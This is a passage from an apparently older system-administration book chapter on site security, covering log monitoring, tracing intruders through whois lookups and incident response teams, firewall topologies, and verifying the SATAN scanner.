Otherwise, have it reschedule itself using the UNIX deferred-execution utility, at, as described in Chapter 12, "Forms for Batching Processes," or conceal it under an innocuous-sounding name. These techniques make it less likely that a successful cracker will discover the log filter and disable the warning.

Any time the log shows evidence that these warning limits have been violated, the script can send e-mail to the system administrator. The administrator will also want to visually check the log from time to time to make sure the patterns haven't changed.

Catching the Wily Cracker

Sooner or later, it's bound to happen. The xinetd logs show a relentless attack on telnetd, ftpd, or fingerd. Or worse still, they don't show the attack, but there is an unexplained gap in the log. The site has been penetrated. Now is the time to call the IRT. Depending on what the attacker has done, a call to the appropriate law enforcement agency may also be in order.

To start the investigation, look at the log entries to determine where the attack came from. The log will show an IP address. As this chapter shows, such information can be forged, but knowing the supposed IP is at least a starting point.

To check out an IP address, start with the InterNIC, the clearinghouse for domain names operated for the U.S. Government. Use Telnet to connect to rs.internic.net. At the prompt, enter whois and the first three octets from the log. For example, if the log says the attack came from 199.198.197.1, enter

whois 199.198.197

This query should return a record showing who is assigned to that address. If nothing useful is revealed, examine higher-level addresses, such as

whois 199.198

Eventually the search should reveal an organization's name. Now at the whois: prompt, enter that name. The record that whois returns will list the names of one or more coordinators. That person should be contacted (preferably by the IRT) so they can begin checking on their end.

Remember that the IP address may be forged, and the organization (and its staff) may be completely innocent. Be careful about revealing any information about the investigation outside official channels, both to avoid tipping off the intruder and to avoid casting suspicion on an innocent organization.

Remember, too, that any information sent by e-mail can be intercepted by the cracker. The cracker is likely to monitor e-mail from root or from members of the security group.

Even if mail is encrypted, the recipient's address can still be read, and a cracker can be tipped off by seeing e-mail going to the IRT. Use the phone or the fax for initial contacts with the IRT, or exchange e-mail on a system that is not under attack.

Work with the IRT and law enforcement agencies to determine when to block the cracker's attempts. Once crackers are blocked, they may simply move to another target or attack again, being more careful to cover their tracks. Security personnel may want to allow the attacks to continue for a time while they track the cracker and make an arrest.

Firewalls

Much has been said in the news media about the use of firewalls to protect an Internet site. Firewalls have their place and, for the most part, they do what they set out to do. Bear in mind that many of the attacks described in this chapter will fly right through a firewall.

Installing a firewall is the last thing to do for site security, in the literal sense. Follow the recommendations given here for making the site secure so that a cracker has to work hard to penetrate security. Then, if further security is desired, install a firewall.

Using this strategy, the system administrator does not get a false sense of security from the firewall. The system is already resistant to attack before the firewall is installed, and attackers who get through the firewall still have their work cut out for them.

Since most systems will continue to have negligible security for the foreseeable future, one can hope that a cracker who gets through the firewall only to face a seemingly impregnable server will get discouraged and go prey on one of the less-protected systems.

Well, one can always hope.

A firewall computer sits between the Internet and a site, screening or filtering IP packets. It is the physical embodiment of much of a site's security policy. For example, the position taken in the tradeoff between usability and security is called a site's "stance."

A firewall can be restrictive, requiring explicit permission before it allows a service, or permissive, permitting anything that has not been explicitly disallowed. In this way, configuring firewall software is akin to configuring xinetd.

Several designs are available for firewalls. Two popular topologies are the Dual-Homed Gateway and the Screened Host Gateway, illustrated in Figures 40.2 and 40.3, respectively.

Figure 40.2 : Illustration of a Dual-Homed Gateway.

Figure 40.3 : Illustration of a Screened Host Gateway.

The Web server can be run on the bastion host in either topology or inside the firewall with the screened host topology. Other locations are possible but need more complex configuration and sometimes additional software.

Marcus Ranum provides a full description of these and other topologies in his paper, "Thinking About Firewalls," available at ftp://ftp.tis.com/pub/firewalls/firewalls.ps.Z.

Both commercial and free software is available to implement the firewall function. The Firewall Toolkit, available at ftp://ftp.tis.com/pub/firewalls/toolkit/fwtk.tar.Z, is representative.

Security Administrator's Tool for Analyzing Networks

The classic paper on cracking is "Improving the Security of Your Site by Breaking Into it," available online at ftp://ftp.win.tue.nl/pub/security/admin-guide-to-cracking.101.Z.

Dan Farmer and Wietse Venema describe many attacks (some now obsolete). They also propose a tool to automatically check for certain security holes. The tool was ultimately released under the name Security Administrator's Tool for Analyzing Networks (SATAN).

SATAN is an extensible tool. Any executable put into the main directory with the extension .sat is executed when SATAN runs. Information on SATAN is available at http://www.fish.com/satan/.

Once SATAN is installed and started, it "explores the neighborhood" with DNS and a fast version of ping to build a set of targets. It then runs each test program over each target.

When all test passes are complete, SATAN's data filtering and interpreting module analyzes the output, and a reporting program formats the data for use by the system administrator.

See also: http://www.netsurf.com/nsf/latest.focus.html.

Making Sure You Have a Legitimate Version of SATAN

For some functions, SATAN must run with root privilege. One way an infiltrator might break into a system is to distribute a program that masquerades as SATAN or to add .sat tests that actually widen security holes.

To be sure you have a legitimate version of SATAN, check the MD5 message digest fingerprint. The latest fingerprints for each component are available at http://www.cs.ruu.nl/cert-uu/satan.html.

This chapter picks up where Chapter 17, "How to Keep Portions of the Site Private," left off. It describes the threat to the site as a whole, resources that can help secure a site, and specific tools and techniques that can enhance security and make it more likely that an attack will be detected, even if it succeeds.